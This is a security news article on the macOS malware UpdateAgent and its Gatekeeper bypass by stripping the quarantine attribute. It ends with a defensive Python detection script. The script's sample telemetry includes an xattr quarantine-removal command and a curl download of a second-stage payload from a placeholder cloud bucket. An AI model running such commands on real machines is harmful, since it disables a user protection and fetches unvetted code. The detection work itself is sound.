UpdateAgent has grown into a more hostile malware for macOS users

February 21, 2022
Tags: UpdateAgent, Hostile Malware, Infostealer, Mac OS, Adware, Adload

UpdateAgent, a macOS malware family, has been circulating for more than a year. Researchers say it began as a basic infostealer and nothing more. Since then its operators have developed it continuously, and each new version has shipped with additional capabilities.

According to the researchers, UpdateAgent now has functionality well beyond that of an ordinary infostealer and has become a serious threat in its own right. Most notably, it can push AdLoad, an aggressive second-stage adware family that installs a persistent and hard-to-remove backdoor.

AdLoad in turn injects advertisements into web pages and search results. It does this with a person-in-the-middle setup: it installs a web proxy on the victim's machine, hijacks search results and ad slots, and thereby siphons ad revenue away from the legitimate website owners.

UpdateAgent also sends a periodic heartbeat to its command-and-control server so the operators know which infections are still live. For reconnaissance it collects system profile data, in particular by running system_profiler with the SPHardwareDataType argument, whose output includes the machine's serial number.


Researchers say UpdateAgent deceives users by impersonating legitimate software, such as video applications or support agents, and is distributed through compromised websites.


The malware can also abuse native macOS functionality and evade Gatekeeper. Gatekeeper is the macOS control that checks a downloaded app's code signature and notarization before the app is allowed to run; files downloaded by a browser carry a com.apple.quarantine extended attribute that triggers this check. UpdateAgent bypasses it by removing that attribute from the files it downloads, so its payload runs without a Gatekeeper prompt. Any malware that sidesteps Gatekeeper removes one of the main protections macOS users rely on.

It can also use the existing permissions of the logged-in user to carry out its activities, and it deletes its own files and other evidence to cover its tracks.

Lastly, UpdateAgent abuses public cloud infrastructure to host its additional payloads; the observed campaign used Amazon S3 and CloudFront, so the downloads blend in with legitimate traffic to those services.
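The behaviours described above (the system_profiler reconnaissance, the quarantine-attribute removal used to get past Gatekeeper, and second-stage downloads from public cloud hosts) are each visible as command lines in process telemetry. The script below is an added example, not code from the original article or from the researchers' report. It runs simple detection rules over a constructed set of telemetry lines and only flags a user when more than one behaviour fires, because each behaviour on its own is common in legitimate use. The "user=... cmd=..." event format, the sample lines, and the hostnames in them are assumptions made for this example.

```python
import re
from collections import defaultdict

# Constructed sample telemetry: one process-execution record per line, in the
# assumed shape "user=<name> cmd=<command line>". These lines were written for
# this example and are not real UpdateAgent artifacts.
SAMPLE_EVENTS = [
    "user=alice cmd=/usr/bin/xattr -d com.apple.quarantine /Users/alice/Downloads/Installer.app",
    "user=alice cmd=/usr/sbin/system_profiler SPHardwareDataType",
    "user=alice cmd=/usr/bin/curl -s https://example-bucket.s3.amazonaws.com/stage2.zip -o /tmp/stage2.zip",
    "user=bob cmd=/usr/sbin/system_profiler SPHardwareDataType",
    "user=carol cmd=/usr/bin/open /Applications/Safari.app",
]

# Behaviours from the write-up expressed as command-line patterns. Each is weak
# on its own; the decision in suspicious_users() requires several per user.
RULES = {
    # Gatekeeper bypass: deleting the quarantine attribute (xattr -d, -rd, ...)
    # or clearing every extended attribute (xattr -c), which also drops it.
    "quarantine_removed": re.compile(
        r"\bxattr\b\s+(?:-[a-z]*d[a-z]*\s+com\.apple\.quarantine\b|-[a-z]*c[a-z]*\b)"),
    # Reconnaissance: hardware profile, whose output includes the serial number.
    "hardware_recon": re.compile(r"\bsystem_profiler\b.*\bSPHardwareDataType\b"),
    # Second-stage fetch from public cloud object storage / CDN hostnames
    # (hostnames are illustrative; tune to what your environment sees).
    "cloud_payload_fetch": re.compile(
        r"\b(?:curl|wget)\b.*https?://[^\s/]*(?:amazonaws\.com|cloudfront\.net)\b"),
}

EVENT_RE = re.compile(r"^user=(\S+)\s+cmd=(.*)$")


def parse_event(line):
    """Return (user, command_line), or None if the line is not well-formed."""
    m = EVENT_RE.match(line.strip())
    return (m.group(1), m.group(2)) if m else None


def match_rules(command_line):
    """Names of every rule whose pattern appears in the command line."""
    return [name for name, pattern in RULES.items() if pattern.search(command_line)]


def rules_per_user(events):
    """Map each user to the set of distinct rule names their commands fired."""
    hits = defaultdict(set)
    for line in events:
        parsed = parse_event(line)
        if parsed is None:
            continue  # malformed telemetry line; skip rather than crash
        user, cmd = parsed
        hits[user].update(match_rules(cmd))
    return dict(hits)


def suspicious_users(events, min_rules=2):
    """Users who triggered at least `min_rules` distinct behaviours.

    A lone `xattr -d` is routine for developers and a lone system_profiler
    call is routine for support tooling, so a single hit is treated as noise.
    """
    return sorted(u for u, names in rules_per_user(events).items() if len(names) >= min_rules)


if __name__ == "__main__":
    for user, names in sorted(rules_per_user(SAMPLE_EVENTS).items()):
        print(f"{user}: {sorted(names)}")
    print("suspicious:", suspicious_users(SAMPLE_EVENTS))
```

Run against the constructed sample, only alice is flagged: bob's single system_profiler call and carol's benign open are reported but not escalated. In a real deployment the events would come from an EDR or from macOS unified logging, and the cloud-host rule should be narrowed to buckets and distributions your organisation does not own.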

UpdateAgent shows how a simple infostealer can grow into a serious threat when its operators are given enough time to iterate. Defenders should treat it as an actively maintained family and watch for its behaviours (quarantine-attribute removal, hardware reconnaissance, cloud-hosted second-stage downloads) rather than only for known samples.
